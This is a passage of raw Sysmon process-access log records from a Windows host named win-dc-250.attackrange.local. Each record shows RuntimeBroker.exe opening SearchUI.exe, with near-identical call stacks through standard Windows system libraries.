13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012105Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012104Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012103Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012102Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012101Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012100Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012099Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012098Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012097Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012096Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012095Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012094Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012093Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012092Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012091Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012090Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012089Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012088Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012087Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 